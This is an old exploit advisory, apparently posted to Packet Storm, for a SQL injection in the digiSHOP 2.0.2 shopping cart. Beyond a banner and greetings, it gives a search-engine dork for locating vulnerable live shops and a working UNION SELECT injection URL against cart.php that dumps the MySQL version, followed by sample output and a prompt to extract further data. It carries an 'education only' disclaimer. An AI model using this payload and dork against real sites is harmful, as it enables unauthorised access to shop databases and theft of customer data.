digiSHOP 2.0.2 SQL Injection

2010-11-04T00:00:00
ID PACKETSTORM:95475
Type packetstorm
Reporter Silic0n
Modified 2010-11-04T00:00:00

Description

                                        
                                            `-----------------------------------  
TM |  
___ ___ _______ |  
| Y | ______ | | |  
|. 1 ||______||.| | | |  
|. _ | `-|. |-' |  
|: | | |: | |  
|::.|:. | |::.| |  
`--- ---' `---' |  
Private Place Of 0days |  
-----------------------------------  
  
^Exploit Title :  
^Date : 23/7/2010  
^Vendor Site : http://digishop.digisoft77.com/  
^MOD Version : digiSHOP 2.0.2  
^Author : Silic0n (science_media017[At]yahoo.com)  
^Team Site : www.hacking-truths.net  
^Dork : inurl:cart.php?m=features&id=  
------------------------------------------------------------------------------  
Special Thnanks To Jackh4x0r , Gaurav_raj420 , Mr 52 (7) , Dalsim , Zetra , haZl0oh , root4o, Belma(sweety) ,Danzel,  
messsy , ,abronsius ,Nova ,ConsoleFx , Exi , Beenu , R4cal , jaya ,@ry@n,[]0iZy5 & All my friends .  
  
My Frnd Site : www.igniteds.net , www.anti-intruders.org (Will Be Up Very Soon)  
----------------------------------->Exploit<----------------------------------  
  
0x1: Goto http://{localhost}/{Shop path}/cart.php?m=features&id=-15+Union+Select+1,2,@@version,4,5,6,7  
  
MySql Version : 4.1.22-log  
  
Now Use Brain.Exe (7) To extract the Other information  
this exploit is only education Purpose only ,author or team member is not responsible for any harm  
  
------------------------------------------------------------------------------  
  
  
`